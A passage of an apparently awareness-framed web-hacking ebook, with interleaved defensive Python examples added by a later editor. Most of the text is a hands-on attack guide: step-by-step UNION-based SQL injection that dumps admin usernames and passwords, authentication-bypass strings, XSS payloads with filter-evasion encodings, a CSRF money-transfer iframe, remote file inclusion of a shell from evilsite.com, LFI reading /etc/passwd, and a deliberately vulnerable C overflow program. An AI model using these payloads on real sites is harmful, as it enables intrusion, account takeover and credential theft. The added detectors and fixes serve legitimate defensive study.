Let's say that we have number 2 on the screen. Now to check the version we replace the number 2 with @@version or version() and get something like 4.1.33-log or 5.0.45 or similar. It should look like this:

http://www.site.com/news.php?id=5 union all select 1,@@version,3/*

If you get an error "union + illegal mix of collations (IMPLICIT + COERCIBLE) ..." then we have to use the convert() function:

http://www.site.com/news.php?id=5 union all select 1,convert(@@version using latin1),3/*

or hex() and unhex():

http://www.site.com/news.php?id=5 union all select 1,unhex(hex(@@version)),3/*

and you will get the MySQL version.

5) Getting table and column names

If the MySQL version is < 5 (i.e. 4.1.33, 4.1.12 ...) we must guess table and column names in most cases (MySQL > 5 is described in step 6). Common table names are: user/s, admin/s, member/s ... Common column names are: username, user, usr, user_name, password, pass, passwd, pwd etc. For example:

http://www.site.com/news.php?id=5 union all select 1,2,3 from admin/*

(we see number 2 on the screen like before, and that's good) so we know that the table admin exists. Now to check column names:

http://www.site.com/news.php?id=5 union all select 1,username,3 from admin/*

(if you get an error, then try another column name) we get a username displayed on the screen, for example admin or superadmin etc. Now to check if the column password exists:

http://www.site.com/news.php?id=5 union all select 1,password,3 from admin/*

(if you get an error, then try another column name) we see the password on the screen as a hash or in plaintext; it depends on how the database is set up, i.e. md5 hash, mysql hash, sha1 ... Now we complete the query so the output looks nice. For that we can use the concat() function (it joins strings):

http://www.site.com/news.php?id=5 union all select 1,concat(username,0x3a,password),3 from admin/*

Note that I put 0x3a, the hex value for : (a colon). There is another way to write it, char(58), the ASCII value for the colon:

http://www.site.com/news.php?id=5 union all select 1,concat(username,char(58),password),3 from admin/*

Now the username and password will be displayed on the screen, i.e. admin:admin or admin:<encrypted hash>. When you have the username and password you can log in as admin or some superuser.

6) MySQL 5

Like I said before, here is how to get table and column names in MySQL > 5. For this we need information_schema, which holds all tables and columns in the database. To get tables we use table_name and information_schema.tables, i.e.

http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables/*

Here we replace our number 2 with table_name to get the first table from information_schema.tables displayed on the screen. Now we must add LIMIT to the end of the query to list out all tables, i.e.

http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 0,1/*

Note that I put 0,1 (get 1 result starting from the 0th). Now to view the second table we change limit 0,1 to limit 1,1:

http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 1,1/*

The second table is displayed. For the third table we put limit 2,1:

http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 2,1/*

Keep incrementing until you get something useful like db_admin, poll_user, auth, auth_user etc.

To get the column names the method is the same; here we use column_name and information_schema.columns:

http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 0,1/*

The first column is displayed. For the second one we change limit 0,1 to limit 1,1:

http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 1,1/*

The second column is displayed, so keep incrementing until you get something like username, user, login, password, pass, passwd etc.

If you want to display the column names of a specific table, use a WHERE clause. Let's say that we found the table users:

http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns where table_name='users'/*

Now we get a column name from the table users displayed; using LIMIT as before we can list all columns in the table users. Note that this won't work if magic quotes is ON.

Let's say that we found the columns user, pass and email. Now to put them all together in one query we use concat(), described earlier:

http://www.site.com/news.php?id=5 union all select 1,concat(user,0x3a,pass,0x3a,email),3 from users/*

What we get here is user:pass:email from the table users, for example admin:hash:[email protected]
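Seen from the server side, the walkthrough above leaves a recognisable trail in the web server's access log: a stray quote on a numeric id, the ORDER BY ladder, UNION SELECT and information_schema enumeration, one request after another from the same client. The following detection script is an added example and not from the original book. The log lines are constructed (the addresses are documentation ranges) and the rule names are my own; the log format is the common Apache format.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Constructed access-log lines (not from the original text; 203.0.113.0/24 and
# 198.51.100.0/24 are documentation ranges). The first host replays the probing
# sequence from the walkthrough; the second is ordinary traffic, including a
# legitimate apostrophe in a search term.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /news.php?id=5 HTTP/1.1" 200 5123
203.0.113.7 - - [10/Oct/2023:13:55:40 +0000] "GET /news.php?id=5' HTTP/1.1" 500 312
203.0.113.7 - - [10/Oct/2023:13:55:52 +0000] "GET /news.php?id=5%20order%20by%203/* HTTP/1.1" 200 5123
203.0.113.7 - - [10/Oct/2023:13:55:58 +0000] "GET /news.php?id=5%20order%20by%204/* HTTP/1.1" 500 298
203.0.113.7 - - [10/Oct/2023:13:56:10 +0000] "GET /news.php?id=5%20union%20all%20select%201,@@version,3/* HTTP/1.1" 200 5140
203.0.113.7 - - [10/Oct/2023:13:56:30 +0000] "GET /news.php?id=5%20union%20all%20select%201,table_name,3%20from%20information_schema.tables%20limit%200,1/* HTTP/1.1" 200 5160
198.51.100.4 - - [10/Oct/2023:13:57:01 +0000] "GET /news.php?id=12 HTTP/1.1" 200 4870
198.51.100.4 - - [10/Oct/2023:13:57:05 +0000] "GET /search.php?q=O%27Brien HTTP/1.1" 200 2210
"""

# Common log format: client, ident, user, [time], "method target protocol", status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)

# Patterns applied to the decoded, lower-cased parameter value. Each one maps
# to a step of the walkthrough above.
RULES = [
    ("order-by ladder", re.compile(r"\border\s+by\s+\d+")),
    ("union select", re.compile(r"\bunion\s+(all\s+)?select\b")),
    ("information_schema", re.compile(r"\binformation_schema\.")),
    ("version probe", re.compile(r"@@version|\bversion\(\)")),
    ("sql comment", re.compile(r"/\*|--")),
]


def classify_value(raw_value):
    """Return the names of the rules a single parameter value trips."""
    value = unquote_plus(raw_value).lower()   # second decode catches double-encoded probes
    hits = [name for name, pattern in RULES if pattern.search(value)]
    if re.fullmatch(r"\d+'", value):           # numeric id with a stray quote: the test in step 1
        hits.append("quote appended to numeric id")
    return hits


def scan_log(text):
    """Return (ip, path, parameter, reasons) for every suspicious parameter value."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                           # unparseable line: skip, do not crash the pipeline
        parts = urlsplit(m.group("target"))
        for name, raw in parse_qsl(parts.query, keep_blank_values=True):
            reasons = classify_value(raw)
            if reasons:
                findings.append((m.group("ip"), parts.path, name, reasons))
    return findings


def probing_ips(text, threshold=3):
    """IPs with at least `threshold` flagged requests: the ladder, not a single typo."""
    counts = {}
    for ip, _, _, _ in scan_log(text):
        counts[ip] = counts.get(ip, 0) + 1
    return sorted(ip for ip, n in counts.items() if n >= threshold)


if __name__ == "__main__":
    for ip, path, param, reasons in scan_log(SAMPLE_LOG):
        print(f"{ip:14} {path:12} {param}= {', '.join(reasons)}")
    print("probing:", probing_ips(SAMPLE_LOG))
```

The threshold in probing_ips is what separates a user who typed an apostrophe from the incrementing ORDER BY / LIMIT sequence the text describes; a single flagged request is noise, five in a minute from one address is the pattern.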
After getting the credentials you can log in to the admin panel. Commonly admin panels are located at /login.ext, /admin.ext or /adminlogin.ext (where ext is the extension of the platform the website is built on, like php, asp etc.). Or you can use Google dorks, or find it online using an online admin panel finder like
http://scan.subhashdasyam.com/admin-panel-finder.php
Authentication Bypass

As the name implies, it is a flaw in badly coded web apps which allows direct access to the backend of a web app without any valid credentials. By inputting some malicious strings we can get access to the backend. Here are some such strings:

' or ''='
' or 1=1--
admin'--
admin' or '1'='1--
admin' or '1'='1'--
admin' or 1=1 or ''='
admin' or 1=1--
admin') or ('1'='1--
admin') or '1'='1--

Let's take a form which takes a username and password and builds this query:

SELECT * FROM Users WHERE Username='$User' AND Password='$Pass'

Let user = ' or '1'='1'-- and pass = ' or '1'='1'--

The query will become

SELECT * FROM Users WHERE Username='' or '1'='1'--' AND Password='' or '1'='1'--'

Since we know 1 is always equal to 1, the condition is true and the database authenticates the user without knowing the actual username and password. The -- means comment: it tells the database not to execute the remainder, so anything after the -- is neglected and is not executed.
XSS

XSS, or Cross Site Scripting, is one of the biggest security flaws in web applications. It allows an attacker to steal cookies, redirect users to malicious pages etc. This vulnerability has affected all types of websites, from Google to Facebook. It is a type of vulnerability which allows an attacker to inject malicious code into web apps. When talking of XSS we think of JavaScript, but it is not only JavaScript: it can be HTML or XML as well as JavaScript. It is caused by poor coding: when developers don't filter special symbols like ">", """ and "/", an attacker can take advantage of it. Malicious strings can be inserted into the page by tampering with the URL, search fields, input fields, comment boxes etc. A common XSS script looks like this:

<script>alert("root@localhost:~#")</script>

It will pop up an alert box.
XSS is of three types:
a) Persistent
b) Non-Persistent
c) DOM based

a) Persistent: As the name indicates it is a kind of XSS which works for a temporary time; it is commonly executed through an HTTP query or a form submission. It is also called reflected XSS. A persistent XSS could look like this:

http://vulnerablesite.tld/index.php?parameter=<script>alert("XSS")</script>

b) Non-Persistent: It is a kind of XSS in which the malicious script is stored in the web app permanently, so whenever a user tries to view the page the script gets executed. A common example is a comment box: when an attacker inserts some malicious script into the comment field it gets saved in the web app permanently. If that comment box doesn't sanitise requests, the script gets executed every time a user visits the page containing that comment box. It is also called stored XSS. A non-persistent XSS could look like this:

<script src=http://evilsite.tld/maliciouspage.js></script>

c) DOM based: It is also called type-0 XSS; it occurs by modifying the DOM environment of the browser. The client side is responsible for this attack, whereas in reflected and stored XSS the server-side code is responsible. The server-side response doesn't change, but the client-side code runs in a different manner.

Many sites are vulnerable but don't execute the code because developers filter special symbols. These filters can be bypassed by encoding the payload using various techniques like hex, char codes, ASCII etc.
After encoding, the malicious code looks like this:

Source string: <script>alert("XSS")</script>

URL encoded: %3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%22%58%53%53%22%29%3C%2F%73%63%72%69%70%74%3E

HTML value (with semicolons): <script>&#x61;lert("X&#x53;S")</script>

HTML value (without semicolons): <script>&#x61lert("X&#x53S")</script>

Base64: PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD4=

Demo XSS using an XML file: <script xmlns="http://www.w3.org/2000/svg">
Impact of XSS:
• Remotely control the browser.
• Spread worms, malware etc.
• Redirect to malicious pages.
• Steal cookies and thus hijack accounts.
• Exploit the browser.
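What the encodings listed above mean for a defender, as an added example that is not from the original book: a keyword filter applied to the raw input is bypassed by every encoded variant, a filter applied after canonicalisation is not, and escaping at output time neutralises the payload whatever form it arrived in. The encoded strings are copied from the list above (the two HTML-entity forms are reconstructed from that list); the filter and function names are my own.

```python
import base64
import html
from urllib.parse import unquote

PLAIN = '<script>alert("XSS")</script>'

# The encoded forms listed above, as constructed inputs. The HTML entity forms
# are reconstructed from the "with/without semicolons" lines.
VARIANTS = {
    "url": "%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%22%58%53%53%22%29%3C%2F%73%63%72%69%70%74%3E",
    "html_with_semicolons": '<script>&#x61;lert("X&#x53;S")</script>',
    "html_without_semicolons": '<script>&#x61lert("X&#x53S")</script>',
}
B64 = "PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD4="


def naive_filter_blocks(value):
    """The kind of keyword filter the text says developers write: it looks for
    the literal text 'alert(' in whatever bytes arrived."""
    return "alert(" in value.lower()


def canonicalize(value, max_rounds=3):
    """Undo URL and HTML-entity encoding, repeating until the value stops
    changing, so a filter sees what the browser would see. Bounded so that
    pathological input cannot keep it decoding forever."""
    for _ in range(max_rounds):
        decoded = html.unescape(unquote(value))
        if decoded == value:
            break
        value = decoded
    return value


def decode_base64_listing(b64text):
    """The base64 line above decodes to the same payload. A browser does not
    decode it on its own, but a scanner comparing payload lists should."""
    return base64.b64decode(b64text).decode("utf-8")


def render_text(untrusted):
    """The actual fix: escape for the HTML text context at output time.
    However the input was encoded, '<' can no longer open a tag."""
    return html.escape(untrusted, quote=True)


if __name__ == "__main__":
    for name, v in VARIANTS.items():
        print(f"{name:24} raw blocked: {naive_filter_blocks(v)!s:5} "
              f"canonical blocked: {naive_filter_blocks(canonicalize(v))}")
    print("base64  ->", decode_base64_listing(B64))
    print("escaped ->", render_text(PLAIN))
```

Canonicalising before matching is what makes an input filter comparable across encodings, but it is still a blocklist; the output-escaping function is the control that holds regardless of which encoding the next bypass uses.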
CSRF

CSRF, or Cross Site Request Forgery, is one of the most dangerous vulnerabilities in web apps. In CSRF a victim is forced to execute an HTTP request that performs some action on his behalf. The only requirements are that the victim is logged in at that time and a little bit of social engineering. A CSRF vulnerability is very easy to exploit and can have a very critical impact. It is commonly executed using an image tag or an iframe.

Demo of CSRF:

<iframe src="http://anonymousbank.com/transfer?account=John&amount=9999999999&recipient=Ahmad"></iframe>

As you can see above, when this piece of code is embedded in a web page and John is forced to open that page, it will transfer 9999999999 from John's account to Ahmad.
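How the bank in the demo above would stop that transfer, as an added example that is not from the original book: the action is only accepted over POST, it must carry a token derived from the victim's session that an attacker's page cannot know, and the Origin/Referer header must point at the bank itself. The request dictionaries, the session id and the server secret are constructed; the host name is the one from the demo.

```python
import hashlib
import hmac
from urllib.parse import urlsplit

BANK_HOST = "anonymousbank.com"                         # host from the demo above
SERVER_SECRET = b"constructed-secret-not-for-real-use"  # assumption: kept server side only


def csrf_token_for(session_id):
    """Derive a per-session token. It is embedded in the bank's own forms and
    never appears in a URL, so the attacker's page cannot reproduce it."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def transfer_allowed(request):
    """Decide whether /transfer may run. `request` is a plain dict with the
    parts of an HTTP request that matter here (a constructed shape, not a
    framework object). Returns (allowed, reason)."""
    if request["method"] != "POST":
        return False, "state-changing action must be a POST, not a GET"
    session_id = request["cookies"].get("session")
    if not session_id:
        return False, "no session cookie: not logged in"
    supplied = request["form"].get("csrf_token", "")
    if not hmac.compare_digest(supplied, csrf_token_for(session_id)):
        return False, "missing or wrong csrf token"
    origin = request["headers"].get("Origin") or request["headers"].get("Referer")
    if origin and urlsplit(origin).hostname != BANK_HOST:
        return False, "request originated from another site"
    return True, "ok"


# Constructed requests. John's browser attaches his session cookie to all of
# them, which is exactly what CSRF relies on.
JOHN_SESSION = "sess-john-1234"

FORGED_IFRAME_GET = {            # the <iframe src=".../transfer?..."> from the demo
    "method": "GET",
    "cookies": {"session": JOHN_SESSION},
    "form": {},
    "headers": {"Referer": "http://evilsite.tld/page.html"},
}
FORGED_AUTO_POST = {             # an auto-submitting form on the attacker's page
    "method": "POST",
    "cookies": {"session": JOHN_SESSION},
    "form": {"account": "John", "amount": "9999999999", "recipient": "Ahmad"},
    "headers": {"Origin": "http://evilsite.tld"},
}
GENUINE_POST = {                 # the bank's own form, carrying the token
    "method": "POST",
    "cookies": {"session": JOHN_SESSION},
    "form": {"account": "John", "amount": "50", "recipient": "Ahmad",
             "csrf_token": csrf_token_for(JOHN_SESSION)},
    "headers": {"Origin": "https://anonymousbank.com"},
}

if __name__ == "__main__":
    for label, req in [("iframe GET", FORGED_IFRAME_GET),
                       ("forged POST", FORGED_AUTO_POST),
                       ("genuine POST", GENUINE_POST)]:
        print(f"{label:13} -> {transfer_allowed(req)}")
```

The three checks are layered on purpose: the method check alone defeats the iframe and image-tag variants the text mentions, the token defeats a forged POST, and the origin check catches a token that leaked or was reused from another site.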
Buffer Overflow

Here comes the real part. A buffer overflow is the vulnerability that occurs when a program tries to write more data into a buffer than it can hold, so the data spills into adjacent memory and overwrites whatever was stored there. The extra data can contain malicious code which triggers some malicious action. With a buffer overflow an attacker can get partial or full control over the victim's machine; later he can add backdoors to the victim's machine for further action and use the victim's system as a bot. It is one of the deadliest attacks. Exploitation differs between heap-based and stack-based overflows.
Buffer overflow demo (thanks to Passwdatt)

/* This program is a good example of a buffer overflow attack that corrupts data
   (the password) without modifying the address of the variable that stores it.
   The program accepts a user name as input and loads the stored encrypted
   password into a buffer. When the user enters a password that is longer than
   8 characters, it overwrites the system password, creating a window of
   opportunity for a hacker to break into the system. The valid usernames and
   passwords can be found in the init_list function. The program uses a Caesar
   cipher where the shift is 3. For example a,b,c will be d,e,f and so on, and
   x,y,z will be a,b,c. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <conio.h>    /* getch(); Windows-only, like system("pause") below */

// defines how long the username/password should be. For a unix system, the length is 8.
#define MAXLENGTH 8
// increase this if more users are added to this system.
#define LISTLENGTH 5

/* Structure used to store the list of user names and their corresponding
   passwords. More names can be added by increasing the array length. */
struct usrlst {
    char *unames[10];
    char *passwd[10];
};

// Function prototypes
void init_list(struct usrlst *u);
int get_indx(char *pch, struct usrlst *u);
void encode_passwd(const char *, char *);

/* The main program. */
int main(void)
{
    struct usrlst usr;
    int i = 0, pass_indx = -2;
    char ch_tmp = '\0';
    // keep the length of the string one greater than MAXLENGTH to accommodate
    // the '\0' character at the end. The four rows are adjacent in memory, so
    // writing past the end of usrpasswd runs straight into sys_enc_pass.
    char buffer[4][MAXLENGTH + 1];
    char *usrname, *usrpasswd, *sys_enc_pass, *usr_enc_pass;

    usrname      = buffer[0];
    usrpasswd    = buffer[1];
    sys_enc_pass = buffer[2];
    usr_enc_pass = buffer[3];
    //printf("<%p>,<%p>,<%p>,<%p>\n", &usrname[0], &usrpasswd[0], &sys_enc_pass[0], &usr_enc_pass[0]);

    printf("Password table is shown as below:\n");
    printf("Username \t\t Password \t Encrypted Password\n");
    printf(" joe \t\t\t ilovemsu \t\t loryhpvx\n");
    printf(" bob \t\t\t manitoba \t\t pdqlwred\n");
    printf(" john \t\t\t inbombay \t\t lqerpedb\n");
    printf(" marc \t\t\t hiobiwan \t\t klrelzdq\n");
    printf(" alice \t\t cometous \t\t frphwrxv\n");
    init_list(&usr);

    printf("Please enter your username (lowercase): ");
    gets(usrname);     // unbounded read into a 9-byte buffer: the first overflow
    if (strlen(usrname) > 0)
        pass_indx = get_indx(usrname, &usr);
    else
        printf("You entered an invalid username.\nPlease try again.\nGoodbye!!\n");

    if (pass_indx >= 0) {
        strcpy(sys_enc_pass, usr.passwd[pass_indx]);
        //printf("The sys passwd is: %s\n", sys_enc_pass);
        printf("Please enter the password for user %s: ", usrname);
        ch_tmp = '\0';
        i = 0;
        for (;;) {
            ch_tmp = getch();
            if (i == MAXLENGTH) {
                // terminates the password but keeps reading: every further
                // character is written past the end of usrpasswd
                usrpasswd[i] = '\0';
                i++;
            }
            if (ch_tmp == '\r') {
                printf("\n");
                break;
            }
            usrpasswd[i] = ch_tmp;
            //putchar(ch_tmp); // uncomment this if you want to echo the password on the screen
            putchar('*');      // comment this if you want to see the password instead of *
            i++;
        }
        //printf("The password you entered is: %s\n", usrpasswd);
        encode_passwd(usrpasswd, usr_enc_pass);
        printf("<%s>,<%s>,<%s>,<%s>\n", usrname, usrpasswd, sys_enc_pass, usr_enc_pass);
        if (!strcmp(usr_enc_pass, sys_enc_pass)) {
            printf("Thank you, your password has been accepted.\nWelcome!!\n");
        } else {
            printf("Sorry, your password was not accepted.\nPlease try again.\nGoodbye!!\n");
        }
    }
    system("pause");
    return 0;
}

/* Encrypt the user entered password and return the Caesar cipher back.
   The substitution is simply to replace a letter with the letter standing
   three places down the alphabet. Also note, the replacement letters wrap
   around, viz: z->c */
void encode_passwd(const char *s, char *r)
{
    int i, ch;
    for (i = 0; i < MAXLENGTH; i++) {
        ch = s[i] + 3;
        if (ch > 122)      // past 'z': wrap around to the start of the alphabet
            ch -= 26;
        r[i] = ch;
    }
    r[MAXLENGTH] = '\0';
}

/* check if the username exists in the database. if it does, get the index of
   its corresponding password. return -1 if the username is not found. */
int get_indx(char *pch, struct usrlst *u)
{
    int i;
    for (i = 0; i < LISTLENGTH; i++) {
        if (!strcmp(pch, u->unames[i]))
            break;
    }
    if (i < LISTLENGTH)
        return i;
    return -1;
}

/* store all the usernames and passwords in the usrlst structure. */
void init_list(struct usrlst *u)
{
    u->unames[0] = "joe";
    u->unames[1] = "bob";
    u->unames[2] = "john";
    u->unames[3] = "marc";
    u->unames[4] = "alice";

    u->passwd[0] = "loryhpvx";   // ilovemsu
    u->passwd[1] = "pdqlwred";   // manitoba
    u->passwd[2] = "lqerpedb";   // inbombay
    u->passwd[3] = "klrelzdq";   // hiobiwan
    u->passwd[4] = "frphwrxv";   // cometous
}
RFI

It's not only input validation attacks which can damage a server; believe me, RFI can do it too with the same ease. It is a vulnerability which allows an attacker to include remote files on a server. It is easier than a SQL injection. After uploading a shell an attacker can root the server, deface websites hosted on it, steal the source code of websites etc.

Demo of RFI:

http://vulnerablesite.com/index.php?page=http://evilsite.com/shell.php

If the site opens the included page like an iframe inside the current page, then the website is vulnerable.

Things needed:
• A shell
• A web host which will host your shell
• If the application automatically adds an extension to the file, then we must use a null byte "%00" (without quotes) to avoid an error:

http://vulnerablesite.com/index.php?page=http://evilsite.com/shell.php%00

Otherwise our request becomes the following, which is incorrect:

http://vulnerablesite.com/index.php?page=http://evilsite.com/shell.php.php

Impacts of RFI:
• Remote code execution on the web server
• Code execution on the client side
• Document hijacking, including the database it is stored on
• Source code theft
• DDoS
LFI

LFI, or Local File Inclusion, is the opposite of RFI: in LFI, files on the server are included rather than remote files as in RFI. With LFI an attacker can view as well as execute a local file on the server. After successfully exploiting an LFI vulnerability an attacker can execute remote code on the machine.

On a Unix based server an attacker can get hold of some important files like /etc/passwd, /etc/shadow, /etc/release, /proc/self/environ etc. Some of the important files which an attacker can get on a Windows based machine are \boot.ini, \php.ini, \Program Files\Apache Software Foundation\Apache\conf\logs\access.log, \Program Files\Apache Software Foundation\Apache\conf\logs\error.log etc.

The vulnerable URL looks like this:

http://www.vulnerablesite.com/index.php?page=../../../../../etc/passwd

or, using a null byte if it adds a file extension automatically:

http://www.vulnerablesite.com/index.php?page=../../../../../etc/passwd%00

(List of system accounts, usernames and hashes from /etc/passwd)

After finding a vulnerable site an attacker can execute code on the machine using a user agent changer. You can use a browser user agent changer add-on; it has an easy GUI. The attacker changes the User-Agent to the code he wants executed. In the example below the attacker enters code which uploads a shell as shell.txt and later renames it to shell.php.
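The RFI and LFI sections above both come down to one untrusted parameter being handed to an include. Here is how the page=... handler should treat it, as an added example that is not from the original book: an allowlist of page names as the preferred fix, and a confined-path fallback that rejects the remote URLs, null bytes and ../ traversal shown in the examples above. The directory layout and page names are constructed; the URLs checked are the ones from the text.

```python
import os
from urllib.parse import unquote

# Constructed layout (an assumption, not the site in the text): page templates
# live under this directory and nothing outside it may ever be included.
PAGES_DIR = os.path.realpath("/var/www/app/pages")
ALLOWED_PAGES = {"home", "news", "contact"}


def resolve_include_strict(page):
    """Preferred fix: an allowlist. The parameter is a key looked up in a fixed
    set and is never used as a path or a URL at all."""
    if page in ALLOWED_PAGES:
        return os.path.join(PAGES_DIR, page + ".php")
    return None


def resolve_include_confined(page, base_dir=PAGES_DIR):
    """Weaker fallback when the page set is not fixed: decode, reject the
    tricks from the text (remote URLs, null bytes, traversal) and confine the
    result to base_dir. Returns the path to include, or None."""
    page = unquote(page)                  # the server decodes %00 and friends before use
    if "\x00" in page:
        return None                       # shell.php%00 / passwd%00 would cut the ".php" suffix off
    if "://" in page or page.startswith("//"):
        return None                       # remote include (RFI)
    if os.path.isabs(page):
        return None                       # absolute local path
    candidate = os.path.realpath(os.path.join(base_dir, page + ".php"))
    if os.path.commonpath([candidate, base_dir]) != base_dir:
        return None                       # ../../../../../etc/passwd escaped the directory (LFI)
    return candidate


if __name__ == "__main__":
    for p in ("home", "http://evilsite.com/shell.php", "http://evilsite.com/shell.php%00",
              "../../../../../etc/passwd", "../../../../../etc/passwd%00"):
        print(f"{p:38} strict={resolve_include_strict(p)}  confined={resolve_include_confined(p)}")
```

The confined variant resolves the path with realpath before comparing, so symlinks and ../ sequences are normalised away before the check rather than matched as text; even so, the allowlist is the version to ship, because it leaves no path to validate at all.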
Open Redirection

These vulnerabilities are found in parameters of an application which redirect a user to a different website without validation. This can be a serious privacy threat to the user: an attacker can redirect a user to a phishing page or a specially crafted malicious page containing malware, and thus control the victim's PC remotely. An attacker can exploit this vulnerability like this:

http://securesite.com/index.php?page=http://evilsite.tld

When a victim clicks on this URL he will be redirected to http://evilsite.tld without any validation. Thus an attacker can hijack accounts, install malware, redirect to phishing pages etc. This vulnerability is featured in many bug bounty programs and the payout is from $300 to $500 and even more.
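The validation the example above is missing, as an added example that is not from the original book: the redirect handler only accepts site-relative paths and falls back to the home page for anything else, which covers the absolute URL from the example and the protocol-relative and backslash forms that browsers also treat as leaving the site. The function names are my own and the parameter name page is taken from the URL above.

```python
from urllib.parse import urlsplit

DEFAULT_LANDING = "/"


def safe_redirect_target(target, default=DEFAULT_LANDING):
    """Return the Location to send the user to. Only site-relative paths
    survive; anything that could leave the site falls back to `default`."""
    if not target:
        return default
    target = target.strip()
    if "\\" in target or "\r" in target or "\n" in target:
        return default          # browsers turn "\" into "/"; CR/LF would inject response headers
    parts = urlsplit(target)
    if parts.scheme or parts.netloc:
        return default          # http://evilsite.tld, //evilsite.tld, javascript:... all land here
    if not parts.path.startswith("/"):
        return default          # require an explicit site-relative path
    return target


def redirect_response(page_param):
    """The (status, Location) pair an index.php?page=... handler would emit."""
    return 302, safe_redirect_target(page_param)


if __name__ == "__main__":
    for candidate in ("http://evilsite.tld", "//evilsite.tld", "/\\evilsite.tld",
                      "javascript:alert(1)", "/account/settings?tab=1", ""):
        print(f"{candidate!r:28} -> {redirect_response(candidate)}")
```

If the application genuinely needs to redirect to other hosts, compare urlsplit(target).hostname against a fixed list of allowed hosts instead of relaxing this check; a substring or prefix match on the host name is the usual way such a fix ends up bypassable.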
About

This book has been written by Ubaid aka $cr1pt Kid33, founder and designer of xedlgubaid.blogspot.com. It has been written to raise awareness about the latest security threats. The author has been acknowledged by PayPal Inc. and has found many security vulnerabilities in various internet giants. Feel free to contact the author at mailto:[email protected]

"Thanks to all those who said no; it's only because of them I did it myself"